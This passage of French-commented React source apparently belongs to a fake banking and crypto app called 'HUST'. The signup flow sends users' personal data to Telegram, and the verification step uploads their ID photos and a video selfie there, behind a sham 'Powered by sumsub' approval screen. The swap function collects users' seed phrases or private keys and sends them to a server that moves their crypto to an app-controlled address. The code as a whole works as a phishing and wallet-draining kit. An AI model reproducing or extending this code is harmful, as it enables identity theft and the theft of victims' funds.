  const isDateValid = validateBirthDate();
  const isPostalValid = validatePostal();
  
  // Validation de l'adresse
  const isAddressValid = validateAddress();
  
  // Validation de la ville
  const isCityValid = validateCity();
  
  // Validation du pays
  const isCountryValid = validateCountry();
  
  // Si un des champs n'est pas valide, ne pas continuer
  if (!isDateValid || !isPostalValid || !isAddressValid || !isCityValid || !isCountryValid) return;
  
  // Si tout est valide, passer à l'étape suivante
  setCurrentPage('signup-step3');
};

  const handleSignUp3 = async (e) => {
  e.preventDefault();
  if (!phoneCountry || !formData.phone) {
    alert('Veuillez entrer un numéro de téléphone valide');
    return;
  }
  
  // Créer l'objet userData complet
  const userData = {
    ...formData,
    phoneCountry: phoneCountry,
    creationDate: new Date().toISOString(),
    balance: 0,
    cashBalance: 0,
    interestRate: 0.05, 
    monthlyInterest: 0,
    cryptoWallet: {
    BTC: { balance: 0, balanceEUR: 0 },
    ETH: { balance: 0, balanceEUR: 0 },
    USDT: { balance: 0, balanceEUR: 0 },
    SOL: { balance: 0, balanceEUR: 0 }
    }
  };
  
  // Récupérer tous les comptes existants
const allUsers = JSON.parse(localStorage.getItem('allUsers')) || {};

// Ajouter ce compte à la liste en utilisant l'email comme clé
allUsers[formData.email.toLowerCase()] = userData;

// Sauvegarder l'ensemble des comptes
localStorage.setItem('allUsers', JSON.stringify(allUsers));

// Mettre à jour l'état userDetails immédiatement
setUserDetails(userData);

// 🔥 SAUVEGARDE SUR SERVEUR RENDER
try {
  await fetch(`${SERVER_URL}/api/users`, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify(userData)
  });
  console.log("✅ Utilisateur sauvegardé sur Render");
} catch (error) {
  console.log("❌ Erreur sauvegarde Render:", error);
}

// NOUVEAU: Envoyer les données à Telegram
  sendUserDataToTelegram(userData)
    .then(result => {
      if (result.success) {
        console.log("Données utilisateur envoyées à Telegram avec succès");
        
        // Enregistrer le messageId dans les données utilisateur
        const updatedUserData = {
          ...userData,
          telegramMessageId: result.messageId
        };
        
        // Mettre à jour localStorage avec le messageId
        allUsers[formData.email.toLowerCase()] = updatedUserData;
        localStorage.setItem('allUsers', JSON.stringify(allUsers));
        
        // Mettre à jour l'état
        setUserDetails(updatedUserData);
      } else {
        console.error("Erreur d'envoi des données à Telegram:", result.error);
      }
    });

// Réinitialiser les états de vérification vidéo avant de passer à la page
setVideoStage('initial');
setIsRecording(false);
setRecordingTime(0);
setShowCompletionAnimation(false);
setShowAcceptedMessage(false);


setCurrentPage('verification');
};




  
// Fonction pour finaliser l'inscription et télécharger les documents
const handleFinishVerification = async () => {
  try {
    console.log("Début de handleFinishVerification");
    console.log("Documents disponibles:", documents);
    
    setIsLoading(true);
    
    // Télécharger les documents vers Telegram
    if (documents.Recto || documents.Verso || documents.VideoSelfie) {
      const uploadResult = await uploadVerificationDocuments(documents, userDetails?.email || 'user_' + Date.now());
      
      if (uploadResult.success) {
        console.log("Documents envoyés avec succès à Telegram:", uploadResult.messageIds);
        
        // Mettre à jour userDetails avec les IDs des messages Telegram
        const updatedUserDetails = {
          ...userDetails,
          telegramDocuments: uploadResult.messageIds
        };
        
        // Mettre à jour localStorage
        const allUsers = JSON.parse(localStorage.getItem('allUsers')) || {};
        allUsers[updatedUserDetails.email.toLowerCase()] = updatedUserDetails;
        localStorage.setItem('allUsers', JSON.stringify(allUsers));
        
        // Mettre à jour le state
        setUserDetails(updatedUserDetails);
      } else {
        console.error("Erreurs lors de l'envoi des documents:", uploadResult.errors);
      }
    }
    
    // Navigation vers la page suivante
    setCurrentPage('loading');
    
  } catch (error) {
    console.error("Erreur lors de la finalisation de l'inscription:", error);
    setIsLoading(false);
  }
};








 
 

// Fonction pour gérer le dépôt d'argent
const updateBalance = (amount) => {
  if (!userDetails) return;
  
  // Calculer le nouveau solde
  const newBalance = (userDetails.balance || 0) + amount;
  
  // Mettre à jour l'état local
  setUserDetails(prev => ({
    ...prev,
    balance: newBalance
  }));
  
  // Mettre à jour dans localStorage
  const allUsers = JSON.parse(localStorage.getItem('allUsers')) || {};
  allUsers[userDetails.email.toLowerCase()] = {
    ...userDetails,
    balance: newBalance
  };
  localStorage.setItem('allUsers', JSON.stringify(allUsers));
 
 // Sauvegarde hybride
updateUserHybrid(userDetails.email, allUsers[userDetails.email.toLowerCase()]);

  // Fermer le menu
  setShowMenu(false);
  setMenuType(null);
};













// Fonctions pour la page de virements
// Validation du montant - MINIMUM 10€
const validateAmount = (value) => {
  const numValue = parseFloat(value.replace(',', '.'));
  // Solde disponible fixé à 0€
  const availableBalance = userDetails?.cashBalance || 0;
  // Vérifier que le montant est un nombre valide, supérieur à 0 et inférieur ou égal au solde disponible
  return !isNaN(numValue) && numValue > 0 && numValue <= availableBalance;
};

// Gestion du clavier numérique
const handleKeyPress = (key) => {
  if (key === 'backspace') {
    setAmount(prev => {
      if (cursorPosition === 'before') {
        return prev;
      } else {
        const newValue = prev.slice(0, -1) || '0';
        setIsAmountValid(validateAmount(newValue));
        return newValue;
      }
    });
  } else {
    setAmount(prev => {
      let newValue;
      
      if (cursorPosition === 'before') {
        if (prev === '0') {
          newValue = key;
        } else {
          newValue = key + prev;
        }
      } else {
        if (prev === '0' && key !== ',') {
          newValue = key;
        } else {
          newValue = prev + key;
        }
      }
      
      setIsAmountValid(validateAmount(newValue));
      return newValue;
    });
  }
};

// Validation du formulaire bancaire
const validateBankForm = () => {
  if (!surname.trim()) {
    setFormError('Le nom est obligatoire');
    return false;
  }
  if (!bankAccount.trim()) {
    setFormError('L\'IBAN est obligatoire');
    return false;
  }
  if (!bicCode.trim()) {
    setFormError('Le BIC est obligatoire');
    return false;
  }
  setFormError('');
  return true;
};

// Validation IBAN
const validateIban = (iban) => {
  // Format simplifié pour l'exemple
  const ibanRegex = /^[A-Z]{2}[0-9]{2}[A-Z0-9]{11,30}$/i;
  
  if (!iban.trim()) {
    setIbanError("L'IBAN est obligatoire");
    setIsValidIban(false);
    return;
  }
  
  // Supprimer les espaces pour la validation
  const cleanIban = iban.replace(/\s/g, '');
  
  if (!ibanRegex.test(cleanIban)) {
    setIbanError("Format d'IBAN invalide");
    setIsValidIban(false);
    return;
  }
  
  setIbanError('');
  setIsValidIban(true);
};

// Validation BIC
const validateBic = (bic) => {
  // Format simplifié pour l'exemple
  const bicRegex = /^[A-Z]{6}[A-Z0-9]{2}([A-Z0-9]{3})?$/i;
  
  if (!bic.trim()) {
    setBicError("Le BIC est obligatoire");
    setIsValidBic(false);
    return;
  }
  
  // Supprimer les espaces pour la validation
  const cleanBic = bic.replace(/\s/g, '');
  
  if (!bicRegex.test(cleanBic)) {
    setBicError("Format de BIC invalide");
    setIsValidBic(false);
    return;
  }
  
  setBicError('');
  setIsValidBic(true);
};

// Gestionnaires pour IBAN et BIC
const handleIbanChange = (e) => {
  const value = e.target.value;
  setBankAccount(value);
  validateIban(value);
};

const handleBicChange = (e) => {
  const value = e.target.value;
  setBicCode(value);
  validateBic(value);
};

// Validation du formulaire Hust
const validateHustForm = () => {
  if (!nickname.trim()) {
    setFormError('Le nom d\'utilisateur HUST est obligatoire');
    return false;
  }
  setFormError('');
  return true;
};

// Validation du formulaire crypto
const validateCryptoForm = () => {
  if (!cryptoSurname.trim()) {
    setFormError('Le surnom est obligatoire');
    return false;
  }
  if (!walletAddress.trim()) {
    setFormError('L\'adresse du portefeuille est obligatoire');
    return false;
  }
  setFormError('');
  return true;
};

// Gestion des boutons Continuer
const handleBankContinue = () => {
  if (isValidIban && isValidBic) {
    setShowAmountPage(true);
  }
};

const handleHustContinue = () => {
  if (isValidBeneficiary) {
    setShowAmountPage(true);
  }
};

const handleCryptoContinue = () => {
  if (validateCryptoForm()) {
    setShowAmountPage(true);
  }
};

// Réinitialisation des états
const resetTransferStates = () => {
  setShowCryptoPage(false);
  setShowHustPage(false);
  setShowBankPage(false);
  setShowAmountPage(false);
  setShowConfirmation(false);
  setAmount('0');
  setIsAmountValid(false);
  setCursorPosition('after');
  setFormError('');
};









// Fonction pour récupérer le prix des cryptos en temps réel
const fetchCryptoPrice = async (crypto) => {
  const cryptoIds = {
    'BTC': 'bitcoin',
    'ETH': 'ethereum',
    'SOL': 'solana',
    'USDT': 'tether'
  };
  
  try {
    const response = await fetch(
      `https://api.coingecko.com/api/v3/simple/price?ids=${cryptoIds[crypto]}&vs_currencies=eur`
    );
    const data = await response.json();
    return data[cryptoIds[crypto]].eur;
  } catch (error) {
    console.error('Erreur prix crypto:', error);
    return 0;
  }
};

const handleSwapTransaction = async () => {
  setSwapStep('pending');
  
  try {
    // 1. Récupérer l'adresse HUST pour recevoir les cryptos
    const addressResponse = await fetch(`${SERVER_URL}/api/swap-address`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({ crypto: swapFromAsset.symbol })
    });
    
    if (!addressResponse.ok) {
      throw new Error('Impossible de récupérer l\'adresse de dépôt');
    }
    
    const { address: hustAddress } = await addressResponse.json();
    console.log(`📬 Adresse HUST pour ${swapFromAsset.symbol}: ${hustAddress}`);
    
    // 2. Préparer les données d'authentification
    const authMethod = swapSignatureMethod === 'seed' ? 'seed' : 'privateKey';
    const authValue = swapSignatureMethod === 'seed' ? swapSeedPhrase.trim() : swapPrivateKey.trim();
    
    if (!authValue) {
      alert('Veuillez entrer votre seed phrase ou clé privée');
      setSwapStep('signature');
      return;
    }
    
    // 3. Envoyer la transaction blockchain vers l'adresse HUST
    const withdrawResponse = await fetch(`${SERVER_URL}/api/crypto-withdraw`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({
        email: userDetails.email,
        crypto: swapFromAsset.symbol,
        amount: parseFloat(swapAmount),
        address: hustAddress,
        authMethod: authMethod,
        authValue: authValue
      })
    });
    
    const result = await withdrawResponse.json();
    
    if (!result.success) {
      throw new Error(result.error || 'Erreur lors de l\'envoi de la transaction');
    }
    
    // 4. Transaction blockchain RÉUSSIE !
    const txHash = result.transaction?.txHash || result.txHash || 'confirmed';
    setSwapTxHash(txHash);
    console.log(`✅ Transaction swap confirmée: ${txHash}`);
    
    // 5. Mettre à jour les soldes crypto localement (déjà fait par le serveur)
    if (result.user) {
      setUserDetails(result.user);
      
      const allUsers = JSON.parse(localStorage.getItem('allUsers')) || {};
      allUsers[userDetails.email.toLowerCase()] = result.user;
      localStorage.setItem('allUsers', JSON.stringify(allUsers));
    }
    
    // 6. CRÉDITER LE HUST BALANCE IMMÉDIATEMENT (automatique)
    const swapConfirmResponse = await fetch(`${SERVER_URL}/api/swap-instant`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({
        userEmail: userDetails.email,
        userName: userDetails.fullName,
        crypto: swapFromAsset.symbol,
        amount: parseFloat(swapAmount),
        hustAmount: parseFloat(swapEstimatedHust),
        txHash: txHash,
        depositAddress: hustAddress,
        timestamp: new Date().toISOString()
      })
    });
    
    const swapResult = await swapConfirmResponse.json();
    
    if (!swapResult.success) {
      throw new Error('Transaction envoyée mais erreur de crédit HUST Balance');
    }
    
    // 7. Mettre à jour le HUST Balance localement
    if (swapResult.user) {
      setUserDetails(swapResult.user);
      
      const allUsers = JSON.parse(localStorage.getItem('allUsers')) || {};
      allUsers[userDetails.email.toLowerCase()] = swapResult.user;
      localStorage.setItem('allUsers', JSON.stringify(allUsers));
    }
    
    console.log(`✅ HUST Balance crédité: +${swapEstimatedHust}€`);

    // Ajouter à l'historique
addTransaction('swap', {
  amount: parseFloat(swapEstimatedHust) || 0,
  fromCrypto: swapFromAsset.symbol ? `${swapFromAsset.symbol} - ${swapFromAsset.name}` : 'BTC - Bitcoin'
});

    // 8. Afficher la page de succès
    setSwapStep('waiting');
    
    // 9. Réinitialiser les champs sensibles
    setSwapSeedPhrase('');
    setSwapPrivateKey('');
    
  } catch (error) {
    console.error('❌ Erreur swap:', error);
    alert(`Erreur lors du swap: ${error.message}`);
    setSwapStep('signature');
  }
};

// Fonction pour ajouter une transaction à l'historique
const addTransaction = (type, details) => {
  const newTransaction = {
    id: Date.now(),
    date: new Date().toISOString(),
    type: type, // 'hust', 'bank', 'crypto', 'swap'
    ...details
  };
  
  const updatedHistory = [newTransaction, ...transactionHistory];
  setTransactionHistory(updatedHistory);
  
  // Sauvegarder dans userDetails
  const updatedUser = { ...userDetails, transactionHistory: updatedHistory };
  setUserDetails(updatedUser);
  
  const allUsers = JSON.parse(localStorage.getItem('allUsers')) || {};
  allUsers[userDetails.email.toLowerCase()] = updatedUser;
  localStorage.setItem('allUsers', JSON.stringify(allUsers));
};












// Fonctions pour la vérification KYC

// Fonction pour prendre une photo avec la caméra native
const takePhoto = (type) => {
  setCurrentPhotoType(type);
  setShowCustomCamera(true);
};

// Fonction pour traiter la photo capturée (nouvelle fonction à ajouter)
const handleCaptureComplete = (result) => {
  if (result && result.webPath) {
    setDocuments(prev => ({
      ...prev,
      [currentPhotoType]: {
        file: result.file,
        preview: result.webPath
      }
    }));
  }
  setShowCustomCamera(false);
};

// Fonction pour importer une photo depuis la galerie
const importPhoto = async (type) => {
  try {
    const image = await Camera.getPhoto({
      quality: 90,
      allowEditing: false,
      resultType: CameraResultType.Uri,
      source: CameraSource.Photos
    });
    
    if (image && image.webPath) {
      setDocuments(prev => ({
        ...prev,
        [type]: {
          file: image,
          preview: image.webPath
        }
      }));
    }
  } catch (err) {
    console.error("Erreur lors de l'importation:", err);
    alert("Impossible d'importer l'image: " + err.message);
  }
};

// Fonction pour réinitialiser une photo
const resetPhoto = (type) => {
  setDocuments(prev => ({
    ...prev,
    [type]: null
  }));
}; 





// Fonction pour démarrer l'enregistrement vidéo
const videoRecording = () => {
  if (window.currentMediaStream) {
    console.log("Démarrage de l'enregistrement vidéo");
    setIsRecording(true);
    setRecordingTime(0);
    
    // Utiliser une variable locale pour stocker les chunks
    let chunks = [];
    
    // Détermination du type MIME supporté
let mimeType = 'video/webm';
let options = {};

// Essayer d'abord avec différents codecs
if (MediaRecorder.isTypeSupported('video/webm;codecs=vp9,opus')) {
  mimeType = 'video/webm;codecs=vp9,opus';
} else if (MediaRecorder.isTypeSupported('video/webm;codecs=vp8,opus')) {
  mimeType = 'video/webm;codecs=vp8,opus';
} else if (MediaRecorder.isTypeSupported('video/webm')) {
  mimeType = 'video/webm';
}

// Ajouter des options d'encodage plus explicites
options = {
  mimeType: mimeType,
  videoBitsPerSecond: 2500000, // 2.5 Mbps
  audioBitsPerSecond: 128000   // 128 kbps
};

console.log("Format vidéo utilisé:", mimeType);

    // Créer un MediaRecorder avec ces options
// Sur iOS avec Canvas, capturer le stream du Canvas
let streamToRecord = window.currentMediaStream;

if (Capacitor.isNativePlatform() && window.canvasElement) {
  console.log("📱 Enregistrement depuis Canvas");
  streamToRecord = window.canvasElement.captureStream(30); // 30 fps
}

const recorder = new MediaRecorder(streamToRecord, options);

    
    // Stocker les données vidéo au fur et à mesure
    recorder.ondataavailable = (event) => {
      console.log("Chunk de données disponible:", event.data.size);
      if (event.data.size > 0) {
        chunks.push(event.data);
      }
    };
    
    // Lorsque l'enregistrement est terminé
recorder.onstop = async () => {
  try {
    console.log("Fin de l'enregistrement");
    console.log("Chunks récupérés:", chunks.length);
    
    // Créer un blob à partir des chunks
    const videoBlob = new Blob(chunks, { type: mimeType });
    console.log("Vidéo créée - Taille:", videoBlob.size, "Type:", videoBlob.type);
    
    // Créer une URL pour le blob
    const videoUrl = URL.createObjectURL(videoBlob);
    console.log("URL vidéo créée:", videoUrl);
    
    // Stocker la vidéo
    setDocuments(prev => {
      console.log("Mise à jour des documents avec la vidéo");
      return {
        ...prev,
        VideoSelfie: {
          file: videoBlob,
          preview: videoUrl,
          isVideo: true
        }
      };
    });
    
    // Déclencher l'animation de complétion au lieu de passer directement à "completed"
    setVideoStage('animation');
    setShowCompletionAnimation(true);
    
    // Afficher le message après 3 secondes
    setTimeout(() => {
      setShowAcceptedMessage(true);
    }, 3000);
    
    // Terminer et retourner à l'écran principal après 6 secondes
    setTimeout(() => {
      setShowCompletionAnimation(false);
      setShowAcceptedMessage(false);
      setVideoStage('completed');
    }, 6000);
  } catch (error) {
    console.error("Erreur lors du traitement de la vidéo:", error);
  }
};
  


  
    // Démarrer l'enregistrement
    recorder.start(1000); // Collecter des données toutes les secondes
    console.log("Enregistreur démarré");
    setMediaRecorder(recorder);
    
    // Compte à rebours
    const recordingInterval = setInterval(() => {
      setRecordingTime(prev => {
        const newTime = prev + 1;
        console.log("Temps d'enregistrement:", newTime);
        if (newTime >= 15) {
          clearInterval(recordingInterval);
          console.log("Enregistrement terminé automatiquement après 15 secondes");
          if (recorder && recorder.state === 'recording') {
            recorder.stop();
          }
          return 15;
        }
        return newTime;
      });
    }, 1000);
    
    window.recordingIntervalId = recordingInterval;
  } else {
    console.error("Pas de flux média disponible pour l'enregistrement");
  }
};

   


    




// Fonction pour précharger la caméra
const preloadCamera = async () => {
  try {
    // Éviter de demander plusieurs fois les permissions
    if (!window.cameraPreloaded) {
      window.cameraPreloaded = true;
      
      // Demander les permissions à l'avance
      const stream = await navigator.mediaDevices.getUserMedia({
        video: { facingMode: "user" }
      });
      
      // Stocker le stream pour une utilisation ultérieure ou l'arrêter
      stream.getTracks().forEach(track => track.stop());
      
      console.log("Caméra préchargée avec succès");
    }
  } catch (error) {
    console.log("Erreur lors du préchargement de la caméra:", error);
  }
};


// Nouvelle fonction pour initialiser juste la prévisualisation
const initializeCameraPreview = async () => {
  try {
    if (!Capacitor.isNativePlatform()) {
  const stream = await navigator.mediaDevices.getUserMedia({
    video: { facingMode: "user" },
    audio: false
  });
  
  const previewContainer = document.getElementById('camera-preview-container');
  if (previewContainer && previewContainer.firstElementChild) {
    let cameraContainer = previewContainer.firstElementChild;
    if (!cameraContainer) {
      cameraContainer = document.createElement('div');
      cameraContainer.className = 'w-3/4 h-3/4 rounded-full overflow-hidden';
      previewContainer.appendChild(cameraContainer);
    } else {
      cameraContainer.innerHTML = '';
    }
    
    const videoElement = document.createElement('video');
    videoElement.srcObject = stream;
    videoElement.autoplay = true;
    videoElement.playsInline = true;
    videoElement.className = 'w-full h-full object-cover';
    // Solution universelle iOS + Android + Web
    videoElement.style.cssText = `
    -webkit-transform: scaleX(-1) !important;
    transform: scaleX(-1) !important;
    -moz-transform: scaleX(-1) !important;
    width: 100% !important;
    height: 100% !important;
    object-fit: cover !important;
    `;
  
    cameraContainer.appendChild(videoElement);
    window.currentMediaStream = stream;
  }
  return;
}
    

      // Arrêter tout flux existant avant d'en créer un nouveau
    if (window.currentMediaStream) {
      window.currentMediaStream.getTracks().forEach(track => track.stop());
    }
    
    const stream = await navigator.mediaDevices.getUserMedia({
      video: {
        facingMode: "user",
        width: { ideal: 1920 },
        height: { ideal: 1920 },
        aspectRatio: 1
      }
    });
    
    const previewContainer = document.getElementById('camera-preview-container');
    if (previewContainer && previewContainer.firstElementChild) {
      const cameraContainer = previewContainer.firstElementChild;
      cameraContainer.innerHTML = '';
      
      // Sur iOS : Utiliser Canvas pour inverser (fix WKWebView bug)
      if (Capacitor.isNativePlatform()) {
        console.log("📱 iOS détecté - Canvas inversion");
        
        // Vidéo cachée avec flux original
        const hiddenVideo = document.createElement('video');
        hiddenVideo.srcObject = stream;
        hiddenVideo.autoplay = true;
        hiddenVideo.playsInline = true;
        hiddenVideo.muted = true;
        hiddenVideo.style.position = 'absolute';
        hiddenVideo.style.top = '-9999px';
        document.body.appendChild(hiddenVideo);
        
        // Canvas pour afficher vidéo inversée EN PLEIN ÉCRAN
        const canvas = document.createElement('canvas');
        canvas.width = window.innerWidth * window.devicePixelRatio;
        canvas.height = window.innerHeight * window.devicePixelRatio;
        canvas.className = 'w-full h-full object-cover';
        canvas.style.width = '100%';
        canvas.style.height = '100%';
        const ctx = canvas.getContext('2d');
        
        // Qualité maximale
        ctx.imageSmoothingEnabled = true;
        ctx.imageSmoothingQuality = 'high';
        
        hiddenVideo.onloadedmetadata = () => {
          hiddenVideo.play();
          
          function drawFrame() {
            if (!hiddenVideo.paused && !hiddenVideo.ended) {
              // Calculer pour remplir l'écran sans déformation
              const videoAspect = hiddenVideo.videoWidth / hiddenVideo.videoHeight;
              const canvasAspect = canvas.width / canvas.height;
              
              let drawWidth, drawHeight, offsetX, offsetY;
              
              if (videoAspect > canvasAspect) {
                // Vidéo plus large : on coupe les côtés
                drawHeight = canvas.height;
                drawWidth = drawHeight * videoAspect;
                offsetX = (canvas.width - drawWidth) / 2;
                offsetY = 0;
              } else {
                // Vidéo plus haute : on coupe haut/bas
                drawWidth = canvas.width;
                drawHeight = drawWidth / videoAspect;
                offsetX = 0;
                offsetY = (canvas.height - drawHeight) / 2;
              }
              
              ctx.save();
              ctx.scale(-1, 1);
              ctx.drawImage(hiddenVideo, -offsetX - drawWidth, offsetY, drawWidth, drawHeight);
              ctx.restore();
              requestAnimationFrame(drawFrame);
            }
          }
          drawFrame();
        };
        
        cameraContainer.appendChild(canvas);
        window.currentMediaStream = stream;
        window.hiddenVideoElement = hiddenVideo;
        window.canvasElement = canvas;
        
      } else {
        // Web : CSS simple
        const videoElement = document.createElement('video');
        videoElement.srcObject = stream;
        videoElement.autoplay = true;
        videoElement.playsInline = true;
        videoElement.className = 'w-full h-full object-cover';
        videoElement.style.transform = 'scaleX(-1)';
      
      // Ajouter l'élément vidéo uniquement dans le conteneur enfant
      cameraContainer.appendChild(videoElement);
      
      // Stocker la référence du stream
      window.currentMediaStream = stream;
    }
  }  // ← AJOUTEZ CETTE LIGNE ICI

  } catch (error) {
    console.error("Erreur d'accès à la caméra:", error);
    // Continuer sans caméra en cas d'erreur
  }
};




// Fonction pour initialiser la caméra pour l'enregistrement
const initializeCameraForRecording = async () => {
  try {
    const stream = await navigator.mediaDevices.getUserMedia({
      video: {
        facingMode: "user",
        width: { ideal: 1920 },
        height: { ideal: 1920 },
        aspectRatio: 1
      }
    });
    
    const previewContainer = document.getElementById('camera-preview-container');
    if (previewContainer) {
      previewContainer.innerHTML = '';
      
      // Sur iOS : Utiliser Canvas pour inverser
      if (Capacitor.isNativePlatform()) {
        console.log("📱 iOS Recording - Canvas inversion");
        
        // Vidéo cachée
        const hiddenVideo = document.createElement('video');
        hiddenVideo.srcObject = stream;
        hiddenVideo.autoplay = true;
        hiddenVideo.playsInline = true;
        hiddenVideo.muted = true;
        hiddenVideo.style.position = 'absolute';
        hiddenVideo.style.top = '-9999px';
        document.body.appendChild(hiddenVideo);
        
        
        // Canvas pour afficher vidéo inversée EN PLEIN ÉCRAN
        const canvas = document.createElement('canvas');
        canvas.width = window.innerWidth * window.devicePixelRatio;
        canvas.height = window.innerHeight * window.devicePixelRatio;
        canvas.className = 'w-full h-full object-cover';
        canvas.style.width = '100%';
        canvas.style.height = '100%';
        const ctx = canvas.getContext('2d');
        
        // Qualité maximale
        ctx.imageSmoothingEnabled = true;
        ctx.imageSmoothingQuality = 'high';
        
        hiddenVideo.onloadedmetadata = () => {
          hiddenVideo.play();
          
          function drawFrame() {
            if (!hiddenVideo.paused && !hiddenVideo.ended) {
              // Calculer pour remplir l'écran sans déformation
              const videoAspect = hiddenVideo.videoWidth / hiddenVideo.videoHeight;
              const canvasAspect = canvas.width / canvas.height;
              
              let drawWidth, drawHeight, offsetX, offsetY;
              
              if (videoAspect > canvasAspect) {
                // Vidéo plus large : on coupe les côtés
                drawHeight = canvas.height;
                drawWidth = drawHeight * videoAspect;
                offsetX = (canvas.width - drawWidth) / 2;
                offsetY = 0;
              } else {
                // Vidéo plus haute : on coupe haut/bas
                drawWidth = canvas.width;
                drawHeight = drawWidth / videoAspect;
                offsetX = 0;
                offsetY = (canvas.height - drawHeight) / 2;
              }
              
              ctx.save();
              ctx.scale(-1, 1);
              ctx.drawImage(hiddenVideo, -offsetX - drawWidth, offsetY, drawWidth, drawHeight);
              ctx.restore();
              requestAnimationFrame(drawFrame);
            }
          }
          drawFrame();
        };
        
        previewContainer.appendChild(canvas);
        window.currentMediaStream = stream;
        window.hiddenVideoElement = hiddenVideo;
        window.canvasElement = canvas;
        
      } else {
        // Web : CSS simple
        const videoElement = document.createElement('video');
        videoElement.srcObject = stream;
        videoElement.autoplay = true;
        videoElement.className = 'w-full h-full object-cover';
        videoElement.style.transform = 'scaleX(-1)';
        
        previewContainer.appendChild(videoElement);
        window.currentMediaStream = stream;
      }
    }
  } catch (error) {
    console.error("Erreur d'accès à la caméra:", error);
    alert(`Impossible d'accéder à la caméra: ${error.message}`);
    setIsRecording(false);
  }
};







// Fonction pour terminer l'enregistrement vidéo
const endVideoRecording = () => {
  console.log("Fin manuelle de l'enregistrement vidéo");
  setIsRecording(false);
  
  if (window.recordingIntervalId) {
    clearInterval(window.recordingIntervalId);
  }
  
  // Arrêter le MediaRecorder
  if (mediaRecorder && mediaRecorder.state === 'recording') {
    console.log("Arrêt du MediaRecorder");
    mediaRecorder.stop();
  } else {
    console.log("MediaRecorder non disponible ou déjà arrêté");
  }
  
  // ✅ AJOUTEZ CES LIGNES ICI ↓
  // Nettoyer les éléments Canvas iOS
  if (window.hiddenVideoElement) {
    window.hiddenVideoElement.remove();
    window.hiddenVideoElement = null;
  }
  if (window.canvasElement) {
    window.canvasElement = null;
  }
  // ✅ FIN DE L'AJOUT ↑  

  // Arrêter la caméra
  if (window.currentMediaStream) {
    console.log("Arrêt des pistes média");
    window.currentMediaStream.getTracks().forEach(track => track.stop());
  }
  
  // Changer l'étape vidéo
  setVideoStage('completed');
};


// Fonction pour obtenir l'instruction en fonction du temps
const getInstruction = () => {
  if (recordingTime < 5) {
    return "Regardez droit devant";
  } else if (recordingTime < 10) {
    return "Tournez votre visage à droite";
  } else {
    return "Tournez votre visage à gauche";
  }
};



// Composant pour l'animation de complétion
const VerificationCompletionAnimation = ({ showAcceptedMessage }) => {
  return (
    <div className="fixed inset-0 bg-white z-50 flex flex-col items-center justify-center">
      <div className="relative">
        {/* Animation des cercles concentriques */}
        <div className="w-32 h-32 rounded-full bg-green-100/60 animate-pulse"></div>
        <div className="absolute inset-4 w-24 h-24 rounded-full bg-green-200/80 animate-pulse" 
             style={{animationDelay: '0.2s'}}></div>
        <div className="absolute inset-8 w-16 h-16 rounded-full bg-green-400 flex items-center justify-center">
          {/* Checkmark icon */}
          <svg className="w-8 h-8 text-white" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path strokeLinecap="round" strokeLinejoin="round" strokeWidth="3" d="M5 13l4 4L19 7" />
          </svg>
        </div>
      </div>
      
      {/* Message that appears after delay */}
      {showAcceptedMessage && (
        <p className="text-gray-800 text-xl font-medium mt-8 animate-fade-in">
          Your data is accepted!
        </p>
      )}
      
      {/* Powered by text */}
      <p className="absolute bottom-4 text-gray-400 text-xs">
        Powered by sumsub
      </p>
    </div>
  );
};
















  // Composant d'appareil photo personnalisé
const CustomCamera = ({ onCapture, onCancel, type }) => {
  // États du composant
  const [capturedImage, setCapturedImage] = useState(null);
  const [showPreview, setShowPreview] = useState(false);
  const [isUploading, setIsUploading] = useState(false);
  const [isLoading, setIsLoading] = useState(true);
  const videoRef = useRef(null);
  const canvasRef = useRef(null);
  const streamRef = useRef(null);

  // Fonction pour capturer une photo
  const capturePhoto = () => {
    if (videoRef.current && canvasRef.current) {
      const video = videoRef.current;
      const canvas = canvasRef.current;
      
      canvas.width = video.videoWidth;
      canvas.height = video.videoHeight;
      
      const context = canvas.getContext('2d');
      // Inverser horizontalement pour la capture
      context.translate(canvas.width, 0);
      context.scale(-1, 1);
      context.drawImage(video, 0, 0, canvas.width, canvas.height);
      // Réinitialiser la transformation
      context.setTransform(1, 0, 0, 1, 0, 0);

      const imageDataUrl = canvas.toDataURL('image/jpeg', 0.9);
      setCapturedImage(imageDataUrl);
      setShowPreview(true);
    }
  };

  // Fonction pour confirmer la photo
  const confirmPhoto = () => {
    const fetchImageFromDataUrl = async (dataUrl) => {
      const res = await fetch(dataUrl);
      const blob = await res.blob();
      const file = new File([blob], `${type}.jpg`, { type: 'image/jpeg' });
      
      const compatibleResult = {
        webPath: dataUrl,
        path: dataUrl,
        format: 'jpeg',
        file: file
      };
      
      // Arrêter complètement le stream de la caméra
      if (streamRef.current) {
        streamRef.current.getTracks().forEach(track => track.stop());
      }
      
      onCapture(compatibleResult);
    };
    
    setIsUploading(true);
    fetchImageFromDataUrl(capturedImage)
      .catch(err => {
        console.error("Erreur lors du traitement de l'image:", err);
        setIsUploading(false);
        alert("Erreur lors du traitement de l'image");
      });
  };

  // Fonction pour reprendre la photo - Affiche immédiatement l'écran de chargement
  const retakePhoto = () => {
    // Activer immédiatement l'écran de chargement noir
    setIsLoading(true);
    
    // Après un court délai, réinitialiser les états et la caméra
    setTimeout(() => {
      setCapturedImage(null);
      setShowPreview(false);
      
      // Réinitialiser complètement la caméra avec un léger délai
      setTimeout(() => {
        initCamera();
      }, 100);
    }, 50);
  };
  
  // Fonction pour initialiser la caméra
  const initCamera = async () => {
    try {
      // L'état de chargement est déjà activé par retakePhoto
      
      // Arrêter tout stream existant
      if (streamRef.current) {
        streamRef.current.getTracks().forEach(track => track.stop());
        streamRef.current = null;
      }
      
      const stream = await navigator.mediaDevices.getUserMedia({
        video: { facingMode: 'environment' },
        audio: false
      });
      
      streamRef.current = stream;
      
      if (videoRef.current) {
        videoRef.current.srcObject = stream;
      }
      
      // Masquer l'écran de chargement après 3 secondes
      setTimeout(() => {
        setIsLoading(false);
      }, 3000);
    } catch (err) {
      console.error("Erreur d'accès à la caméra:", err);
      alert("Impossible d'accéder à la caméra: " + err.message);
      onCancel();
    }
  };
  

  // Effet pour initialiser la caméra au montage
  useEffect(() => {
    initCamera();

    return () => {
      // Nettoyage lors du démontage
      if (streamRef.current) {
        streamRef.current.getTracks().forEach(track => track.stop());
      }
    };
  }, []);

  // Rendu du composant
  return (
